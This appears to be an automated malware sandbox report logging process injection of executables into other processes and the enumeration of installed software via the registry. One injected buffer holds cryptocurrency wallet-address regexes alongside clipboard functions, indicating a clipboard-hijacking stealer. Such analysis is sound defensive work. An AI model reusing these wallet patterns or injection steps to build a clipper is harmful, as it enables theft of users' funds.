WriteProcessMemory June 29, 2021, 1:50 p.m.	buffer: MZÿÿ¸@àº´ Í!¸LÍ!This program cannot be run in DOS mode. $G=°Â\Þ\Þ\ÞÀS\Þù\ÞÙÂ\Þ\ßA]ÞùÇ\Þ$¬*\Þ$¢\Þ$¦\ÞRich\ÞPEL;à]à:â.AP@PßîÏÜ .TPl.textÍ9: `.rdata\|P>@@.data .ðÖ@À.rsrc. 0ð@@ base_address: 0x00400000 process_identifier: 1080 process_handle: 0x0000036c	1	1
WriteProcessMemory June 29, 2021, 1:50 p.m.	buffer: @ base_address: 0x7efde008 process_identifier: 1080 process_handle: 0x0000036c	1	1
WriteProcessMemory June 29, 2021, 1:50 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELÍ³h`à2L²p@0Td Ì.codeÜ `.textC D `.rdataX(p*P@@.datap z@À base_address: 0x00400000 process_identifier: 2060 process_handle: 0x00000368	1	1
WriteProcessMemory June 29, 2021, 1:50 p.m.	buffer: h(hh°$AèüÄhèõ£´$Ahhhèâ£°$Aè<Dè¦Aèòèè hÐ$Ah´ @hhhè¢A-Ð$Aºf @Mèº @Mèrº¢ @Mèeº @MèXº* @MèKRè DZPRèDZP¸v @Pè¸º: @Rè-DhÈ$AèDº$ @ Ì$AèÇÄ$Aë¸;Ä$A È$ARèªCZPRèâCÄ$A-Ð$AÁãTRèÉCº\ @Rè¾Ch¼$AèDÿ5¼$Aèö!À¨Rè[CZPRèSCZPºV @RèCRè@CZPhèXè^D½¼ @Uÿ5¼$AèÏT$èëèß£¸$A¸$A!Û~GÌ$ARèôBZPRè,CRèæBZPRèÞBZP¡¸$ARPèoXº> @RèChÌ$AèYCÿÄ$Aæþÿÿÿ5Ì$Aè¢Ãû~>RèBZPÿ5Ì$ARèBZP¸PèpºB @Rè¯Bè$èè-hèè.Bÿ5°$Aè è èBèèó;èÃUSºÒìÇ$Juóè°C$T$è1 $\L$è! ÿ´$XXD$D$D$$D$lÇ$DT$1Éè£ u'Rè»AZPº& @RèîAT$RèäAD$Pè:BD$PD$(PhhhhhhD$$PD$$PèÁl$lÇED$lPl$ÿuè«Ã!Ûuéëhh$@Pl$x¤ÃSl$ ÿuèzÿ´$8l$ÿuè!Àté£$X!Ûué$Xl$]<\$ h@h0l$(ÿuPl$,ÿu4l$ ÿuèD$h\$hû}%$DC$D$Dû~é0éâþÿÿ$<Pl$$ÿuTÿ´$`ÿt$tl$ ÿuèÌl$ EÃl$ ¿EÃ\$Ç$@ël$ ¿]K;$@\|i$<Pl$U$HkÀ(]Åÿu$`l$U$LkÀ(]Å]S\$tl$U$PkÀ(]Å]Sl$ ÿuè6ÿ$@qhhD$pPl$x¤ÃSl$ ÿuè\$hl$ ](Sl$pX°D$lPl$ÿuèâ l$ÿuèÜ l$Eë+hl$ÿuèÈ l$ÿuèÂ l$ÿuè¶ 1Àÿt$èAÿ4$èAÄH[]Â1ÀPè¢@ÿt$èÉ Rèó>ZPRèë>ZPhèD$Pèu?hÿt$hèV \|$t'Rèµ>ZPRè>ZPÿt$è»XPè; ZÐë)ë$Rè>ZPRèÃ>XPè ZÐë è¢@fÇÿ4$èe@ÄÂ1ÀPPPT$$è~ T$L$èq hÿt$hÿÿÿÿè®D$\|$tÿt$ÿt$èvÿt$è1Àÿt$è@ÿ4$èú?ÄÂ base_address: 0x00401000 process_identifier: 2060 process_handle: 0x00000368	1	1
WriteProcessMemory June 29, 2021, 1:50 p.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2060 process_handle: 0x00000368	1	1
WriteProcessMemory June 29, 2021, 1:50 p.m.	buffer: MZÿÿ¸@¸º´ Í!¸LÍ!This program cannot be run in DOS mode. $·ÛósiósiósildòsiRichósiPELy`à¸0@PGwÔ$(@( H.text `.dataà0@À.rsrc@@@¼ç¨^MSVBVM60.DLL base_address: 0x00400000 process_identifier: 1052 process_handle: 0x000003d0	1	1
WriteProcessMemory June 29, 2021, 1:50 p.m.	buffer: base_address: 0x00404000 process_identifier: 1052 process_handle: 0x000003d0	1	1
WriteProcessMemory June 29, 2021, 1:50 p.m.	buffer: @ base_address: 0x7efde008 process_identifier: 1052 process_handle: 0x000003d0	1	1
WriteProcessMemory June 29, 2021, 1:50 p.m.	buffer: MZÿÿ¸@¸º´ Í!¸LÍ!This program cannot be run in DOS mode. $·ÛósiósiósildòsiRichósiPEL(f`à,@@`¨D9(P( h.text*, `.dataà@@À.rsrcP0@@¼ç¨^MSVBVM60.DLL base_address: 0x00400000 process_identifier: 1812 process_handle: 0x000003dc	1	1
WriteProcessMemory June 29, 2021, 1:50 p.m.	buffer: base_address: 0x00405000 process_identifier: 1812 process_handle: 0x000003dc	1	1
WriteProcessMemory June 29, 2021, 1:50 p.m.	buffer: @ base_address: 0x7efde008 process_identifier: 1812 process_handle: 0x000003dc	1	1
WriteProcessMemory June 29, 2021, 1:50 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELJX`à2Ôð@Pd ì.code `.textÌ Î `.rdata¡ð Ø@@.dataô â@À base_address: 0x00400000 process_identifier: 2728 process_handle: 0x000003e4	1	1
WriteProcessMemory June 29, 2021, 1:50 p.m.	buffer: h0hh( CèüÄhèõ£, Chhhèâ£( CèËè´Çèb·èµèèÃhH Ch¤Chh hè«ÇhP Ch¤Chh hèÇRèËZPRèùÊZPº$CRè,ËRèæÊZPRèÞÊZP¸RCPè=µXèkËhhènT$è5è~Ã!Ût è+Ã!Ûuë¸ë1À!Àté±RèÊZPRè{ÊZP¸Pè¼ºbCRè£Êè$èÜh@ CèË¸,CPÿ5@ Cè£8 Cÿ5@ CèÃû}éGÇ4 Cë8 CC;4 C\|IRèþÉZPRèöÉZP¸,CPÿ54 Cÿ5@ Cèm4 CK-H CÁãDPèÊÿ4 Cq¨-P CºÌCMèºdCMèºzCMèö ºCMèé º0CMèÜ ºÖCMèÏ ºCMèÂ ºCMèµ º<CM è¨ Rè:ÉZPRè2ÉZPèÄh< CèñÉÿ5< CD CYèï uÿ5< Cèc< CRèöÈZPRè.ÉhD Cè´Éhôèëhèè©Èÿ5( CèL èM èôèX³èª´èIÀèÃUS1ÀPPPPPPè0ÊT$$$èäÇD$ë¸;D$Ë\$-P CÁãÿthèð!ÀT$Rh¤Chhhè°Äÿt$ÿt$hèØD$\$!Û~bRèÈZPRèþÇZP\$-H CÁãÿtl$ÿuÿt$èÛD$Pè¡Èÿt$èªÃT$Rè¾ÇZPRèöÇD CPèzÈÿD$&ÿÿÿ1Àÿt$èÉÿ4$èÉPÿt$è\ÅXÄ[]ÂS1ÀPPPèÉÿt$è6T$$èºÿ4$hÿÿÿÿèmµD$\|$tPÿt$è¶Ã!Ûu8T$Rè)ÇZPRèaÇRèÇZPRèÇZPÿt$èx·XD$PèÍÇë¹ÿt$è2²T$RèèÆZPRè ÇXPèyZÐë èÿÈfÇÿ4$èÂÈÿt$è¹ÈÄ[Â1ÀPèJÈÿt$èqRèÆZPRèÆZPhè§D$PèMÇhÿt$hè\|$t'Rè]ÆZPRèUÆZPÿt$è±XPèã ZÐë)ë$Rè3ÆZPRèkÆXPèÄ ZÐë èJÈfÇÿ4$è ÈÄÂ base_address: 0x00401000 process_identifier: 2728 process_handle: 0x000003e4	1	1
WriteProcessMemory June 29, 2021, 1:50 p.m.	buffer: ÿÿÿÿCW-\|^D{1}[5-9A-HJ-NP-U]{1}[1-9A-HJ-NP-Za-km-z]{32}$^4[0-9AB][1-9A-HJ-NP-Za-km-z]{93}$^X[1-9A-HJ-NP-Za-km-z]{33}$^[LM][a-km-zA-HJ-NP-Z1-9]{26,33}$USERNAME^((bitcoincash\|bchreg\|bchtest):)?(q\|p)[a-z0-9]{41}$^(bc1\|[13])[a-zA-HJ-NP-Z0-9]{25,39}$^A[0-9a-zA-Z]{33}$^r[0-9a-zA-Z]{33}$wallet.conf^0x[a-fA-F0-9]{40}$ÿÿÿÿ @°@ @°@XòA`òA¤ñAhòApòAxòAòAòAòAòA<ñA`òA òAxòA¨òA°òA¸òAÀòA¬ñAXòAÈòApòAÿÿÿÿ´ èÔþl $.8BNX`jt~¢¶ÄÔäò¦²ÀÜö<HV`n\| ¸ÆÖäô2FXv¢²ÆØê $.8BNX`jt~¢¶ÄÔäò¦²ÀÜö<HV`n\| ¸ÆÖäô2FXv¢²ÆØê memsetMSVCRT.dllúGetModuleHandleW¤HeapCreateCreateMutexWçGetLastError¥HeapDestroyExitProcessöGetModuleFileNameWKERNEL32.dllèwcsncmpmemmoveéwcsncpyî_wcsnicmpé_wcsdup^freemallocÀstrncmpmemcpyprintfæwcslen+Sleep¦HeapFree¢HeapAllocDCloseHandle¹InitializeCriticalSectionÄGetEnvironmentVariableWÙSetEnvironmentVariableWWriteFileCreateFileWçSetFilePointernReadFile©HeapReAlloc=TlsFree>TlsGetValue?TlsSetValue<TlsAllocÚEnterCriticalSectionôLeaveCriticalSectionGlobalLockGlobalUnlockGlobalAllocôSetLastErrorOUnregisterWait¿DeleteCriticalSectionªGetCurrentProcessGetCurrentThreadÕDuplicateHandlexRegisterWaitForSingleObjectWideCharToMultiByteMultiByteToWideCharOpenClipboardGetClipboardDataCloseClipboardEmptyClipboardSetClipboardDataUSER32.DLLtimeBeginPeriodWINMM.DLL base_address: 0x00430000 process_identifier: 2728 process_handle: 0x000003e4	1	1
WriteProcessMemory June 29, 2021, 1:50 p.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2728 process_handle: 0x000003e4	1	1

Code injection by writing an executable or DLL to the memory of another process (8 events)

Time & API	Arguments	Status	Return
WriteProcessMemory June 29, 2021, 1:50 p.m.	buffer: MZÿÿ¸@èº´ Í!¸LÍ!This program cannot be run in DOS mode. $³Lî¨÷-û÷-û÷-û4"ßûõ-û4"Ýûá-û Àûü-û-ûü-û÷-û§,û ûô-ûÐëòûÍ-ûÐëüûö-ûÐëøûö-ûRich÷-ûPEL´Ë^àÐJôfà@Àáµlvð0 äàl.textJÏÐ `.rdataÊà®Ô@@.dataä@À.rsrc0@@ base_address: 0x00400000 process_identifier: 2988 process_handle: 0x0000039c	1	1
WriteProcessMemory June 29, 2021, 1:50 p.m.	buffer: MZÿÿ¸@¸º´ Í!¸LÍ!This program cannot be run in DOS mode. $·ÛósiósiósildòsiRichósiPEL=/`àt0@PÇb'(@( 0.text `.dataÈ0@À.rsrc@@@¼ç¨^MSVBVM60.DLL base_address: 0x00400000 process_identifier: 2128 process_handle: 0x000003a4	1	1
WriteProcessMemory June 29, 2021, 1:50 p.m.	buffer: MZÿÿ¸@èº´ Í!¸LÍ!This program cannot be run in DOS mode. $^ ¨kÆBkÆBkÆBÙdB kÆBàHBkÆBÀHÚBkÆBkÇB jÆBàHßBkÆB=´B/kÆB=ºBkÆB=¾BkÆBRichkÆBPEL»üiTà2¶>P@ øªÈð-ÀSP .textD12 `.rdataZP\6@@.data=°,@À.rsrc-ð.¾@@ base_address: 0x00400000 process_identifier: 1836 process_handle: 0x000003c8	1	1
WriteProcessMemory June 29, 2021, 1:50 p.m.	buffer: MZÿÿ¸@àº´ Í!¸LÍ!This program cannot be run in DOS mode. $G=°Â\Þ\Þ\ÞÀS\Þù\ÞÙÂ\Þ\ßA]ÞùÇ\Þ$¬*\Þ$¢\Þ$¦\ÞRich\ÞPEL;à]à:â.AP@PßîÏÜ .TPl.textÍ9: `.rdata\|P>@@.data .ðÖ@À.rsrc. 0ð@@ base_address: 0x00400000 process_identifier: 1080 process_handle: 0x0000036c	1	1
WriteProcessMemory June 29, 2021, 1:50 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELÍ³h`à2L²p@0Td Ì.codeÜ `.textC D `.rdataX(p*P@@.datap z@À base_address: 0x00400000 process_identifier: 2060 process_handle: 0x00000368	1	1
WriteProcessMemory June 29, 2021, 1:50 p.m.	buffer: MZÿÿ¸@¸º´ Í!¸LÍ!This program cannot be run in DOS mode. $·ÛósiósiósildòsiRichósiPELy`à¸0@PGwÔ$(@( H.text `.dataà0@À.rsrc@@@¼ç¨^MSVBVM60.DLL base_address: 0x00400000 process_identifier: 1052 process_handle: 0x000003d0	1	1
WriteProcessMemory June 29, 2021, 1:50 p.m.	buffer: MZÿÿ¸@¸º´ Í!¸LÍ!This program cannot be run in DOS mode. $·ÛósiósiósildòsiRichósiPEL(f`à,@@`¨D9(P( h.text*, `.dataà@@À.rsrcP0@@¼ç¨^MSVBVM60.DLL base_address: 0x00400000 process_identifier: 1812 process_handle: 0x000003dc	1	1
WriteProcessMemory June 29, 2021, 1:50 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELJX`à2Ôð@Pd ì.code `.textÌ Î `.rdata¡ð Ø@@.dataô â@À base_address: 0x00400000 process_identifier: 2728 process_handle: 0x000003e4	1	1

Collects information about installed applications (50 out of 54 events)

Time & API	Arguments	Status
RegQueryValueExW June 29, 2021, 1:50 p.m.	key_handle: 0x00000394 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: EditPlus regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName	1
RegQueryValueExW June 29, 2021, 1:50 p.m.	key_handle: 0x00000394 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Enterprise 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE\DisplayName	1
RegQueryValueExW June 29, 2021, 1:50 p.m.	key_handle: 0x00000394 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Chrome regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName	1
RegQueryValueExW June 29, 2021, 1:50 p.m.	key_handle: 0x00000394 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 한컴오피스 한글 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName	1
RegQueryValueExW June 29, 2021, 1:50 p.m.	key_handle: 0x00000394 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: HttpWatch Professional 9.3.39 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName	1
RegQueryValueExW June 29, 2021, 1:50 p.m.	key_handle: 0x00000394 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 한컴오피스 한글 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName	1
RegQueryValueExW June 29, 2021, 1:50 p.m.	key_handle: 0x00000394 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Google Update Helper regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}\DisplayName	1
RegQueryValueExW June 29, 2021, 1:50 p.m.	key_handle: 0x00000394 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Access MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 29, 2021, 1:50 p.m.	key_handle: 0x00000394 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Excel MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 29, 2021, 1:50 p.m.	key_handle: 0x00000394 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office PowerPoint MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 29, 2021, 1:50 p.m.	key_handle: 0x00000394 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Publisher MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 29, 2021, 1:50 p.m.	key_handle: 0x00000394 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Outlook MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 29, 2021, 1:50 p.m.	key_handle: 0x00000394 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Word MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 29, 2021, 1:50 p.m.	key_handle: 0x00000394 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proof (English) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 29, 2021, 1:50 p.m.	key_handle: 0x00000394 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proof (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 29, 2021, 1:50 p.m.	key_handle: 0x00000394 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office IME (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 29, 2021, 1:50 p.m.	key_handle: 0x00000394 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 29, 2021, 1:50 p.m.	key_handle: 0x00000394 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Enterprise 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 29, 2021, 1:50 p.m.	key_handle: 0x00000394 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office InfoPath MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 29, 2021, 1:50 p.m.	key_handle: 0x00000394 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared MUI (English) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 29, 2021, 1:50 p.m.	key_handle: 0x00000394 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 29, 2021, 1:50 p.m.	key_handle: 0x00000394 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office OneNote MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 29, 2021, 1:50 p.m.	key_handle: 0x00000394 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Groove MUI (English) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 29, 2021, 1:50 p.m.	key_handle: 0x00000394 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Groove Setup Metadata MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0114-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 29, 2021, 1:50 p.m.	key_handle: 0x00000394 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Flash Player 13 ActiveX regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}\DisplayName	1
RegQueryValueExW June 29, 2021, 1:50 p.m.	key_handle: 0x00000394 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Flash Player 13 NPAPI regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}\DisplayName	1
RegQueryValueExW June 29, 2021, 1:50 p.m.	key_handle: 0x00000394 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}\DisplayName	1
RegQueryValueExW June 29, 2021, 1:50 p.m.	key_handle: 0x00000438 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: EditPlus regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName	1
RegQueryValueExW June 29, 2021, 1:50 p.m.	key_handle: 0x00000438 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Enterprise 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE\DisplayName	1
RegQueryValueExW June 29, 2021, 1:50 p.m.	key_handle: 0x00000438 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Chrome regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName	1
RegQueryValueExW June 29, 2021, 1:50 p.m.	key_handle: 0x00000438 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 한컴오피스 한글 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName	1
RegQueryValueExW June 29, 2021, 1:50 p.m.	key_handle: 0x00000438 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: HttpWatch Professional 9.3.39 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName	1
RegQueryValueExW June 29, 2021, 1:50 p.m.	key_handle: 0x00000438 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 한컴오피스 한글 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName	1
RegQueryValueExW June 29, 2021, 1:50 p.m.	key_handle: 0x00000438 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Google Update Helper regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}\DisplayName	1
RegQueryValueExW June 29, 2021, 1:50 p.m.	key_handle: 0x00000438 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Access MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 29, 2021, 1:50 p.m.	key_handle: 0x00000438 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Excel MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 29, 2021, 1:50 p.m.	key_handle: 0x00000438 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office PowerPoint MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 29, 2021, 1:50 p.m.	key_handle: 0x00000438 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Publisher MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 29, 2021, 1:50 p.m.	key_handle: 0x00000438 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Outlook MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 29, 2021, 1:50 p.m.	key_handle: 0x00000438 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Word MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 29, 2021, 1:50 p.m.	key_handle: 0x00000438 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proof (English) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 29, 2021, 1:50 p.m.	key_handle: 0x00000438 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proof (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 29, 2021, 1:50 p.m.	key_handle: 0x00000438 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office IME (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 29, 2021, 1:50 p.m.	key_handle: 0x00000438 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 29, 2021, 1:50 p.m.	key_handle: 0x00000438 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Enterprise 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 29, 2021, 1:50 p.m.	key_handle: 0x00000438 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office InfoPath MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW June 29, 2021, 1:50 p.m.	key_handle: 0x00000438 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared MUI (English) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE}\DisplayName	1
